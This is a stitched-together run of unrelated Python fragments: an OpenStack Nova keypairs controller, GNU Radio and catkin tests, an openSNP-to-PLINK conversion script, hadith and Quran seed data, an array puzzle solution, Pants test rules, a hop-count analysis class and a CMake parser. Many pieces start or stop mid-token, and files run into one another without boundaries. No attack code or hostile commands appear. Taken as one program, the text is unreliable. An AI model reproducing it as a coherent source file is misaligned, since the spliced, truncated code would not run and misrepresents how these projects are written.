@validation.query_schema(keypairs.delete_query_schema_v275, '2.75') @validation.query_schema(keypairs.delete_query_schema_v210, '2.10', '2.74') @wsgi.response(204) @wsgi.expected_errors(404) def delete(self, req, id): # noqa # handle optional user-id for admin only user_id = self._get_user_id(req) self._delete(req, id, user_id=user_id) def _delete(self, req, id, user_id=None): """Delete a keypair with a given name.""" context = req.environ['nova.context'] # handle optional user-id for admin only user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'delete', target={'user_id': user_id}) try: self.api.delete_key_pair(context, user_id, id) except exception.KeypairNotFound as exc: raise webob.exc.HTTPNotFound(explanation=exc.format_message()) def _get_user_id(self, req): if 'user_id' in req.GET.keys(): user_id = req.GET.getall('user_id')[0] return user_id @wsgi.Controller.api_version("2.10") @validation.query_schema(keypairs.show_query_schema_v275, '2.75') @validation.query_schema(keypairs.show_query_schema_v210, '2.10', '2.74') @wsgi.expected_errors(404) def show(self, req, id): # handle optional user-id for admin only user_id = self._get_user_id(req) return self._show(req, id, key_type=True, user_id=user_id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @validation.query_schema(keypairs.show_query_schema_v20) @wsgi.expected_errors(404) def show(self, req, id): # noqa return self._show(req, id, key_type=True) @wsgi.Controller.api_version("2.1", "2.1") # noqa @validation.query_schema(keypairs.show_query_schema_v20) @wsgi.expected_errors(404) def show(self, req, id): # noqa return self._show(req, id) def _show(self, req, id, key_type=False, user_id=None): """Return data for the given key name.""" context = req.environ['nova.context'] user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'show', target={'user_id': user_id}) try: keypair = 
self.api.get_key_pair(context, user_id, id) except exception.KeypairNotFound as exc: raise webob.exc.HTTPNotFound(explanation=exc.format_message()) return self._view_builder.show(keypair, key_type=key_type) @wsgi.Controller.api_version("2.35") @validation.query_schema(keypairs.index_q
uery_schema_v275, '2.75') @validation.query_schema(keypairs.index_query_schema_v235, '2.35', '2.74') @wsgi.expected_errors(400) def index(self, req):
user_id = self._get_user_id(req) return self._index(req, key_type=True, user_id=user_id, links=True) @wsgi.Controller.api_version("2.10", "2.34") # noqa @validation.query_schema(keypairs.index_query_schema_v210) @wsgi.expected_errors(()) def index(self, req): # noqa # handle optional user-id for admin only user_id = self._get_user_id(req) return self._index(req, key_type=True, user_id=user_id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @validation.query_schema(keypairs.index_query_schema_v20) @wsgi.expected_errors(()) def index(self, req): # noqa return self._index(req, key_type=True) @wsgi.Controller.api_version("2.1", "2.1") # noqa @validation.query_schema(keypairs.index_query_schema_v20) @wsgi.expected_errors(()) def index(self, req): # noqa return self._index(req) def _index(self, req, key_type=False, user_id=None, links=False): """List of keypairs for a user.""" context = req.environ['nova.context'] user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'index',
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 dl1ksv.
#
# SPDX-License-Identifier: GPL-3.0-or-later
#

from gnuradio import gr, gr_unittest
from PyQt5 import Qt
import sip
# from gnuradio import blocks
try:
    from display import text_msg
except ImportError:
    import os
    import sys
    dirname, filename = os.path.split(os.path.abspath(__file__))
    sys.path.append(os.path.join(dirname, "bindings"))
    from display import text_msg


class qa_display_text_msg(gr_unittest.TestCase):

    def setUp(self):
        self.tb = gr.top_block()

    def tearDown(self):
        self.tb = None

    def test_instance(self):
        instance = text_msg('TestString', 'test', 80, None)
        b = sip.wrapinstance(instance.pyqwidget(), Qt.QWidget)

    def test_001_descriptive_test_name(self):
        # set up fg
        self.tb.run()
        # check data


if __name__ == '__main__':
    gr_unittest.run(qa_display_text_msg)
akelists(mock_pack, 'groovy') self.assertTrue('project(foo)' in result, result) self.assertTrue('find_package(catkin REQUIRED)' in result, result) mock_pack.catkin_deps = ['bar', 'baz'] result = create_cmakelists(mock_pack, 'groovy') self.assertTrue('project(foo)' in result, result) expected = """find_package(catkin REQUIRED COMPONENTS bar baz )""" self.assertTrue(expected in result, result) def test_create_package_xml(self): maint = self.get_maintainer() pack = PackageTemplate(name='foo', description='foo', version='0.0.0', maintainers=[maint], licenses=['BSD']) result = create_package_xml(pack, 'groovy') self.assertTrue('<name>foo</name>' in result, result) def test_create_targetlib_args(self): mock_pack = MagicMock() mock_pack.name = 'foo' mock_pack.catkin_deps = [] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp', 'rospy'] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = [] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = [] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement) def test_create_include_macro(self): mock_pack = MagicMock() mock_pack.name = 'foo' mock_pack.catkin_deps = [] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)', statement) mock_pack.catkin_deps = ['roscpp', 'rospy'] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n)', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = [] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n)', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = [] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', 
statement) def test_create_package(self): maint = self.get_maintainer() pack = PackageTemplate(name='bar', description='bar', package_format='1', version='0.0.0', version_abi='pabi', maintainers=[maint], licenses=['BSD']) try: rootdir = tempfile.mkdtemp() file1 = os.path.join(rootdir, 'CMakeLists.txt') file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME) create_package_files(rootdir, pack, 'groovy', {file1: ''}) self.assertTrue(os.path.isfile(file1)) self.assertTrue(os.path.isfile(file2)) finally: shutil.rmtree(rootdir) def test_create_package_template(self): template = PackageTemplate._create_package_template( package_name='bar2', catkin_deps=['dep1', 'dep2']) self.assertEqual('dep1', template.build_depends[0].name) self.assertEqual('dep2', template.build_depends[1].name) def test_parse_generated(self): maint = self.get_maintainer() pack = PackageTemplate(name='bar', package_format=1, version='0.0.0', version_abi='pabi', urls=[Url('foo')], description='pdesc', maintainers=[maint], licenses=['BSD']) try: rootdir = tempfile.mkdtemp() file1 =
os.path.join(rootdir, 'CMakeLists.txt') file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME) create_package_files(rootdir, pack, 'groo
vy') self.assertTrue(os.path.isfile(file1)) self.assertTrue(os.path.isfile(file2)) pack_result = parse_package(file2) self.assertEqual(pack.name, pack_result.name) self.assertEqual(pack.package_format, pack_result.package_format) self.assertEqual(pack.version, pack_result.version) self.assertEqual(pack.version_abi, pack_result.version_abi) self.assertEqual(pack.description, pack_result.description) self.assertEqual(pack.maintainers[0].name, pack_result.maintainers[0].name) self.assertEqual(pack.maintainers[0].email, pack_result.maintainers[0].email) self.assertEqual(pack.authors, pack_result.authors) self.assertEqual(pack.urls[0].url, pack_result.urls[0].url) self.assertEqual('website', pack_result.urls[0].type) self.assertEqual(pack.licenses, pack_result.licenses) self.assertEqual(pack.build_depends, pack_result.build_depends) self.assertEqual(pack.buildtool_depends, pack_result.buildtool_depends) self.assertEqual(pack.run_depends, pack_result.run_depends) self.assertEqual(pack.test_depends, pack_result.test_depends) self.assertEqual(pack.conflicts, pack_result.conflicts) self.assertEqual(pack.replaces, pack_result.replaces) self.assertEqual(pack.exports, pack_result.exports) rdict = generate_distutils_setup(package_xml_path=file2) self.assertEqual({'name': 'bar', 'maintainer': u('John Foo'), 'maintainer_email': 'foo@bar.com', 'description': 'pdesc', 'license': 'BSD', 'version': '0.0.0', 'author': '', 'url': 'foo'}, rdict) finally: shutil.rmtree(rootdir) def test_parse_generated_multi(self): # test with multiple attributes fill
#!/usr/bin/env python # encoding: utf-8 import glob import os import subprocess ''' Convert 23andMe files to PLINK format ''' def twenty3_and_me_files(): """Return the opensnp files that are 23 and me format""" all_twenty3_and_me_files= glob.glo
b('../opensnp_datadump.current/*.23andme.txt') fifteen_mb = 15 * 1000 * 1000 non_junk_files = [path for path in all_twenty3_and_me_files if os.path.getsize(path) > fifteen_mb] return non_junk_files def run_plink_format(usable_files): """Reformat the 23andMe files into plink binary stuff""" for f in usable_files: gid = f.split("/")[-1].split("_")[1].replace("file","") call = "../plink_v190/plink --23file "+ f + " F" + gid
+ "ID" + gid + "I 1" call += " --out ../plink_binaries/" + gid print "convert gid " + gid subprocess.call(call,shell=True) usable_files = twenty3_and_me_files() run_plink_format(usable_files)
# -*- coding: utf-8 -*- """ Contains data that initially get added to the database to bootstrap it. """ from __future__ import unicode_literals # pylint: disable=invalid-name prophet_muhammad = { 'title': u'Prophet', 'display_name': u'النبي محمد (صلى الله عليه وآله وسلم)'.strip(), 'full_name': u'محمد بن عبد الله بن عبد المطلب بن هاشم'.strip(), 'brief_desc': u'نبي الإسلام، عليه وعلى آله الصلاة والسلام'.strip(), 'birth_year': 570, 'death_year': 632 } imam_alsadiq = { 'title': u'Imam', 'display_name': u'الإمام الصادق (عليه السلام)', 'full_name': u"جعفر بن محمد الصادق", 'brief_desc': u'إمام من أئمة المسلمين وسادس أئمة الشيعة الاثنى عشرية' } # pylint: disable=line-too-long first_shia_hadith_text = u''' نضر الله عبدا سمع مقالتي فوعاها وحفظها وبلغها من لم يسمعها، فرب حامل فقه غير فقيه ورب حامل فقه إلى من هو أفقه منه، ثلاث لا يغل عليهن قلب امرئ مسلم: إخلاص العمل لله، والنصحية لائمة المسلمين، واللزوم لجماعتهم، فإن دعوتهم محيطة من ورائهم، المسلمون إخوة تتكافى دماؤهم ويسعى بذمتهم أدناهم. '''.strip() first_sunni_hadith_text = u''' نضر الله عبدا سمع مقالتي فحفظها ووعاها واداها ، فرب حامل فقه غير فقيه ، ورب حامل فقه الى من هو افقه منه ، ثلاث لا يغل عليهن قلب مسلم : اخلاص العمل لله ، والنصيحة للمسلمين ، ولزوم جماعتهم ، فان دعوتهم تحيط من ورايهم '''.strip() # pylint: enable=line-too-long shia_first_hadith_persons = [ u"عبد الله بن أبي يعفور العبدي".strip(), u"ابان بن عثمان الأحمر البجلي".strip(), u"احمد بن محمد بن عمرو بن ابي نصر البزنطي".strip(), u"احمد بن عيسى".strip()] sunni_first_hadith_persons = [ u"عبد الله بن مسعود".strip(), u"عبد الرحمن بن عبد الله الهذلي".strip(), u"عبد الملك بن عمير اللخمي".strip(), u"سفيان بن عيينة الهلالي".strip(), ] holy_quran = u"القرآن الكريم" holy_quran_suras = [ u"الفاتحة", u"البقرة", u"آل عمران", u"النساء", u"المائدة", u"اﻷنعام", u"اﻷعراف", u"اﻷنفال", u"التوبة", u"يونس", u"هود", u"يوسف", u"الرعد", u"إبراهيم", u"الحجر", u"النحل", u"اﻹسراء", u"الكهف", u"مريم", u"طه", u"اﻷنبياء", u"الحج", u"المؤمنون", u"النور", u"الفرقان", u"الشعراء", u"النمل", u"القصص", u"العنكبوت", u"الروم", u"لقمان", u"السجدة", u"اﻷحزاب", u"سبأ", u"فاطر", u"يس", u"الصافات", u"ص", u"الزمر", u"غافر", u"فصلت", u"الشورى", u"الزخرف", u"الدخان", u"الجاثية", u"اﻷحقاف", u"محمد", u"ا
لفتح", u"الحجرات", u"ق", u"الذاريات", u"الطور", u"النجم", u"الق
مر", u"الرحمن", u"الواقعة", u"الحديد", u"المجادلة", u"الحشر", u"الممتحنة", u"الصف", u"الجمعة", u"المنافقون", u"التغابن", u"الطلاق", u"التحريم", u"الملك", u"القلم", u"الحاقة", u"المعارج", u"نوح", u"الجن", u"المزمل", u"المدثر", u"القيامة", u"اﻹنسان", u"المرسلات", u"النبأ", u"النازعات", u"عبس", u"التكوير", u"الانفطار", u"المطففين", u"الانشقاق", u"البروج", u"الطارق", u"اﻷعلى", u"الغاشية", u"الفجر", u"البلد", u"الشمس", u"الليل", u"الضحى", u"الشرح", u"التين", u"العلق", u"القدر", u"البينة", u"الزلزلة", u"العاديات", u"القارعة", u"التكاثر", u"العصر", u"الهمزة", u"الفيل", u"قريش", u"الماعون", u"الكوثر", u"الكافرون", u"النصر", u"المسد", u"اﻹخلاص", u"الفلق", u"الناس"] # كتاب الكافي، باب ما امر النبي صلى الله عليه وآله بالنصيحة لائمة # المسلمين واللزوم لجماعتهم ومن هم؟ # http://www.mezan.net/books/kafi/kafi1/html/ara/books/al-kafi-1/166.html shia_first_hadith_book = u"الكافي" # مسند الشافعي، حديث 1105 # https://library.islamweb.net/hadith/display_hbook.php?bk_no=51&hid=1105&pid= sunni_first_hadith_book = u"مسند الشافعي" first_hadith_tag = u'علم الحديث'
class Solution(object):
    def checkPossibility(self, nums):
        """
        :type nums: List[int]
        :rtype: bool
        """
        n = len(nums)
        t = 0  # number of violations that can be repaired by one modification
        for i in range(n - 1):
            if nums[i] > nums[i + 1]:
                if i - 1 < 0 or i + 2 > n - 1:
                    # violation touches either end of the array: always fixable
                    t += 1
                elif nums[i - 1] <= nums[i + 1]:
                    # nums[i] can be lowered to nums[i + 1]
                    t += 1
                elif nums[i + 2] >= nums[i]:
                    # nums[i + 1] can be raised to nums[i]
                    t += 1
                else:
                    return False
        return True if t <= 1 else False
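# Illustrative checks, not part of the solution above: a few hand-verified
# cases for checkPossibility(); expected values follow the usual
# "non-decreasing array with at most one modification" problem statement.
if __name__ == '__main__':
    s = Solution()
    assert s.checkPossibility([4, 2, 3])          # lower 4 to 1
    assert not s.checkPossibility([4, 2, 1])      # needs two changes
    assert not s.checkPossibility([3, 4, 2, 3])   # no single fix works
    assert s.checkPossibility([1, 4, 2, 3])       # lower 4 to 2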
Mock import pytest from pants.base.exceptions import ResolveError from pants.build_graph.address import Address from pants.engine.fs import ( EMPTY_DIRECTORY_DIGEST, Digest, FileContent, InputFilesContent, Workspace, ) from pants.engine.interactive_runner import InteractiveProcessRequest, InteractiveRunner from pants.engine.legacy.graph import HydratedTargetsWithOrigins, HydratedTargetWithOrigin from pants.engine.legacy.structs import TargetAdaptorWithOrigin from pants.engine.rules import UnionMembership from pants.rules.core.fmt_test import FmtTest from pants.rules.core.test import ( AddressAndTestResult, CoverageDataBatch, CoverageReport, FilesystemCoverageReport, Status, Test, TestDebugRequest, TestResult, TestRunner, WrappedTestRunner, run_tests, ) from pants.testutil.engine.util import MockConsole, MockGet, run_rule from pants.testutil.test_base import TestBase from pants.util.ordered_set import OrderedSet # TODO(#9141): replace this with a proper util to create `GoalSubsystem`s class MockOptions: def __init__(self, **values): self.values = Mock(**values) class MockTestRunner(TestRunner, metaclass=ABCMeta): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return True @staticmethod @abstractmethod def status(_: Address) -> Status: pass @staticmethod def stdout(_: Address) -> str: return "" @staticmethod def stderr(_: Address) -> str: return "" @property def test_result(self) -> TestResult: address = self.adaptor_with_origin.adaptor.address return TestResult(self.status(address), self.stdout(address), self.stderr(address)) class SuccessfulTestRunner(MockTestRunner): @staticmethod def status(_: Address) -> Status: return Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return f"Successful test runner: Passed for {address}!" class ConditionallySucceedsTestRunner(MockTestRunner): @staticmethod def status(address: Address) -> Status: return Status.FAILURE if address.target_name == "bad" else Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return ( f"Conditionally succeeds test runner: Passed for {address}!" if address.target_name != "bad" else "" ) @staticmethod def stderr(address: Address) -> str: return ( f"Conditionally succeeds test runner: Had an issue for {address}! Oh no!" if address.target_name == "bad" else "" ) class InvalidTargetTestRunner(MockTestRunner): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return False @staticmethod def status(_: Address) -> Status: return Status.FAILURE class TestTest(TestBase): def make_ipr(self) -> InteractiveProcessRequest: input_files_content = InputFilesContent( (FileContent(path="program.py", content=b"def test(): pass"),) ) digest = self.request_single_product(Digest, input_files_content)
return InteractiveProcessRequest( argv=("/usr/bin/python", "program.py",), run_in_workspace=False, input_files=digest, ) def run_test_rule( self, *, test_runner: Type[TestRunner], t
argets: List[HydratedTargetWithOrigin], debug: bool = False, ) -> Tuple[int, str]: console = MockConsole(use_colors=False) options = MockOptions(debug=debug, run_coverage=False) interactive_runner = InteractiveRunner(self.scheduler) workspace = Workspace(self.scheduler) union_membership = UnionMembership({TestRunner: OrderedSet([test_runner])}) def mock_coordinator_of_tests( wrapped_test_runner: WrappedTestRunner, ) -> AddressAndTestResult: runner = wrapped_test_runner.runner return AddressAndTestResult( address=runner.adaptor_with_origin.adaptor.address, test_result=runner.test_result, # type: ignore[attr-defined] ) result: Test = run_rule( run_tests, rule_args=[ console, options, interactive_runner, HydratedTargetsWithOrigins(targets), workspace, union_membership, ], mock_gets=[ MockGet( product_type=AddressAndTestResult, subject_type=WrappedTestRunner, mock=lambda wrapped_test_runner: mock_coordinator_of_tests(wrapped_test_runner), ), MockGet( product_type=TestDebugRequest, subject_type=TestRunner, mock=lambda _: TestDebugRequest(self.make_ipr()), ), MockGet( product_type=CoverageReport, subject_type=CoverageDataBatch, mock=lambda _: FilesystemCoverageReport( result_digest=EMPTY_DIRECTORY_DIGEST, directory_to_materialize_to=PurePath("mockety/mock"), ), ), ], union_membership=union_membership, ) return result.exit_code, console.stdout.getvalue() def test_empty_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin(include_sources=False)], ) assert exit_code == 0 assert stdout.strip() == "" def test_invalid_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=InvalidTargetTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], ) assert exit_code == 0 assert stdout.strip() == "" def test_single_target(self) -> None: target_with_origin = FmtTest.make_hydrated_target_with_origin() address = target_with_origin.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[target_with_origin], ) assert exit_code == 0 assert stdout == dedent( f"""\ {address} stdout: {SuccessfulTestRunner.stdout(address)} {address} ..... SUCCESS """ ) def test_multiple_targets(self) -> None: good_target = FmtTest.make_hydrated_target_with_origin(name="good") good_address = good_target.target.adaptor.address bad_target = FmtTest.make_hydrated_target_with_origin(name="bad") bad_address = bad_target.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=ConditionallySucceedsTestRunner, targets=[good_target, bad_target], ) assert exit_code == 1 assert stdout == dedent( f"""\ {good_address} stdout: {ConditionallySucceedsTestRunner.stdout(good_address)} {bad_address} stderr: {ConditionallySucceedsTestRunner.stderr(bad_address)} {good_address} ..... SUCCESS {bad_address} ..... FAILURE """ ) def test_single_debug_target(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], debug=True, ) assert exit_code == 0 def test_multiple_debug_targets_fail(self) -> None: with pytest.raises(ResolveError): self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[
#!/usr/bin/env python2.7 import logging import num
py as np from .analysis import Analysis class HopCountAnalysis(Analysis): def __init__(self, scenario, locati
on, repetitions, csv): Analysis.__init__(self, scenario, location, "hopCount", repetitions, csv) self.logger = logging.getLogger('baltimore.analysis.HopCountAnalysis') self.logger.debug('creating an instance of HopCountAnalysis for scenario %s', scenario) self.data_min = {} self.data_max = {} self.data_median = {} self.data_std = {} self.data_avg = {} def evaluate(self, experiment_results, is_verbose=False): self.logger.info("running hop count analysis") hop_count = {} raw_data = [] for repetition in experiment_results: nodes = experiment_results.nodes_have_metric("hopCount", repetition) for node in nodes: data = experiment_results.get_tuple_metric_per_node("hopCount", node, repetition) for element in data: raw_data.append([repetition, node, float(element[0]), int(element[1])]) if node not in hop_count: hop_count[node] = [] hop_count[node].append(raw_data) raw_data = [] for node, data in list(hop_count.items()): hop_count_data = [element[3] for repetition in data for element in repetition] self.data_min[node] = np.amin(hop_count_data) self.data_max[node] = np.amax(hop_count_data) self.data_median[node] = np.median(hop_count_data) self.data_std[node] = np.std(hop_count_data) self.data_avg[node] = np.average(hop_count_data) self.logger.info("Printing hop count statistics for node %s", node) self.logger.info("Minimum hop count = %f nodes", self.data_min[node]) self.logger.info("Maximum hop count = %f nodes", self.data_max[node]) self.logger.info("Std.Deviation = %f nodes", self.data_std[node]) self.logger.info("Average hop count = %f nodes", self.data_avg[node]) self.logger.info("Median hop count = %f nodes", self.data_median[node]) if self.draw: for node in hop_count: self.metric = "hop_count_node-" + str(node) self.plot_boxplot("Average Hop Count (Node " + str(node) + ")", "Repetition", "Hop Count [ms]", self.data_avg[node]) if self.csv: self.export_csv() self.export_csv_raw(hop_count) def export_csv(self): self.metric = "hopCount" file_name = self.scenario + "_" + self.metric + "_aggregated.csv" disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['# aggregated over ' + str(self.repetitions) + ' repetitions'],['#']] header = ['node', 'min', 'max', 'median', 'std', 'avg'] data = [] for node in self.data_min: data.append([node, self.data_min[node], self.data_max[node], self.data_median[node], self.data_std[node], self.data_avg[node]]) self._write_csv_file(file_name, disclaimer, header, data) def export_csv_raw(self, raw_data): self.metric = "hopCount" file_name = self.scenario + "_" + self.metric + ".csv" disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['#']] header = ['node', 'repetition', 'timestamp', 'hop count'] data = [] for node, hop_counts in list(raw_data.items()): for values in hop_counts: for element in values: data.append([node, element[0], element[2], element[3]]) self._write_csv_file(file_name, disclaimer, header, data)
or arg in args: fixed_parts = [] if arg.startswith("$<BUILD_INTERFACE:"): arg = arg[len("$<BUILD_INTERFACE:"): -1] parts = rex.split(arg) for part in parts: if part.startswith("${"): name = part[2:-1].lower() if name in variables: value = variables[name] if len(value)==1: fixed_parts.append(variables[name][0]) else: fixed_args.extend(value) else: print("Undefined cmake variable '" + name + "' in " + filename) else: fixed_parts.append(part) fixed_args.append(''.join(fixed_parts)) return fixed_args def __FetchCommands(lexer): topmode = True command_list = [] command = None args = [] tok = lexer.token() while 1: if not tok: if command: command_list.append( (command,args) ) break # No more input if topmode: if tok.type=="COMMAND": command = tok.value topmode = False else: print("Fail") # Fail tok = lexer.token() else: # Grab arguments if tok.type=="COMMAND": if command: command_list.append( (command,args) ) command = None args = [] topmode = True continue args.append(tok.value) tok = lexer.token() return command_list if __name__=="__main__": #print("Testing") #lexer = cmakelexer.CMakeLexer() print(ExtractInstallFiles(filename="/home/sbe/devel/svn/kde/trunk/KDE/kdeedu/marble/src/lib/CMakeLists.txt")) def foo(): ExtractInstallFiles(input=""" find_package(KDE4 REQUIRED) include (KDE4Defaults) include_directories(${CMAKE_CURRENT_SOURCE_DIR} ${KDEBASE_WORKSPACE_SOURCE_DIR}/libs ${CMAKE_CURRENT_SOURCE_DIR}/.. ${KDE4_INCLUDES} ${OPENGL_INCLUDE_DIR}) add_subdirectory(tests) add_definitions(-DKDE_DEFAULT_DEBUG_AREA=1209) ########### next target ############### set(plasmagik_SRCS packagemetadata.cpp packagestructure.cpp package.cpp ) set(plasma_LIB_SRCS ${plasmagik_SRCS} abstractrunner.cpp animationdriver.cpp animator.cpp applet.cpp appletbrowser.cpp appletbrowser/customdragtreeview.cpp appletbrowser/kcategorizeditemsview.cpp appletbrowser/kcategorizeditemsviewdelegate.cpp appletbrowser/kcategorizeditemsviewmodels.cpp appletbrowser/openwidgetassistant.cpp appletbrowser/plasmaappletitemmodel.cpp configxml.cpp containment.cpp corona.cpp datacontainer.cpp dataengine.cpp dataenginemanager.cpp delegate.cpp dialog.cpp extender.cpp extenderitem.cpp paintutils.cpp panelsvg.cpp plasma.cpp popupapplet.cpp private/applethandle.cpp private/datacontainer_p.cpp private/desktoptoolbox.cpp private/nativetabbar.cpp private/packages.cpp private/paneltoolbox.cpp private/toolbox.cpp private/tooltip.cpp querymatch.cpp runnercontext.cpp runnermanager.cpp scripting/appletscript.cpp scripting/dataenginescript.cpp scripting/runnerscript.cpp scripting/scriptengine.cpp service.cpp servicejob.cpp svg.cpp theme.cpp tooltipmanager.cpp uiloader.cpp version.cpp view.cpp wallpaper.cpp widgets/checkbox.cpp widgets/combobox.cpp widgets/flash.cpp widgets/frame.cpp widgets/groupbox.cpp widgets/icon.cpp widgets/label.cpp widgets/lineedit.cpp widgets/meter.cpp widgets/pushbutton.cpp widgets/radiobutton.cpp widgets/signalplotter.cpp widgets/slider.cpp widgets/tabbar.cpp widgets/textedit.cpp widgets/webcontent.cpp ) kde4_add_ui_files ( plasma_LIB_SRCS appletbrowser/kcategorizeditemsviewbase.ui ) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) MESSAGE(STATUS "Adding support for OpenGL applets to libplasma") set(plasma_LIB_SRCS ${plasma_LIB_SRCS} glapplet.cpp) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) kde4_add_library(plasma SHARED ${plasma_LIB_SRCS}) target_link_libraries(plasma ${KDE4_KIO_LIBS} ${KDE4_KFILE_LIBS} ${KDE4_KNEWSTUFF2_LIBS} ${QT_QTUITOOLS_LIBRARY} ${QT_QTWEBKIT_LIBRARY} ${KDE4_THREADWEAVER_LIBRARIES} ${KDE4_SOLID_LIBS} ${X11_LIBRARIES}) 
if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) target_link_libraries(plasma ${QT_QTOPENGL_LIBRARY} ${OPENGL_gl_LIBRARY}) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) set_target_properties(plasma PROPERTIES VERSION 3.0.0 SOVERSION 3 ${KDE4_DISABLE_PROPERTY_}LINK_INTERFACE_LIBRARIES "${KDE4_KDEUI_LIBS}" ) install(TARGETS plasma ${INSTALL_TARGETS_DEFAULT_ARGS}) ########### install files ############### set(plasmagik_HEADERS packagemetadata.h packagestructure.h package.h ) install(FILES ${plasmagik_HEADERS} DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/ COMPONENT Devel) set(plasma_LIB_INCLUDES abstractrunner.h animationdriver.h animator.h applet.h appletbrowser.h configxml.h containment.h corona.h datacontainer.h
dataengine.h dataenginemanager.h delegate.h dialog.h extender.h extenderitem.h paintutils.h panelsvg.h plasma.h plasma_export.h popupapplet.h querymatch.h runnercontext.h runnermanager.h service.h servicejob.h svg.h theme.h tooltipmanager.h uiloader.h tooltipmanager.h version.h view.h wallpaper.h) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) set
(plasma_LIB_INCLUDES ${plasma_LIB_INCLUDES} glapplet.h) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) install(FILES ${plasma_LIB_INCLUDES} DESTINATION ${INCLUDE_INSTALL_DIR}/plasma COMPONENT Devel) install(FILES widgets/checkbox.h widgets/combobox.h widgets/flash.h widgets/frame.h widgets/groupbox.h widgets/icon.h widgets/label.h widgets/lineedit.h widgets/meter.h widgets/pushbutton.h widgets/radiobutton.h widgets/signalplotter.h widgets/slider.h widgets/tabbar.h widgets/textedit.h widgets/webcontent.h DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/widgets COMPONENT Devel) install(FILES scripting/appletscript.h scripting/dataenginescript.h scripting/runnerscript.h scripting/scriptengine.h DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/scripting COMPONENT Devel) install(FILES includes/AbstractRunner includes/AnimationDriver includes/Animator includes/Applet includes/AppletBrowser includes/AppletScript includes/CheckBox includes/ComboBox includes/ConfigXml includes/Containment includes/Corona includes/DataContainer includes/DataEngine includes/DataEngineManager includes/DataEngineScript includes/Delegate includes/Dialog includes/Extender includes/ExtenderItem includes/Flash includes/GroupBox includes/Icon includes/Label includes/LineEdit includes/Meter includes/Package includes/PackageMetadata includes/PackageStructure includes/PaintUtils includes/PanelSvg includes/Plasma includes/PopupApplet includes/PushButton includes/QueryMatch includes/RadioButton includes/RunnerContext includes/RunnerManager includes/RunnerScript includes/ScriptEngine includes/Service includes/ServiceJob includes/SignalPlotter includes/Slider includes/Svg includes/TabBar includes/TextEdit includes/ToolTipManager 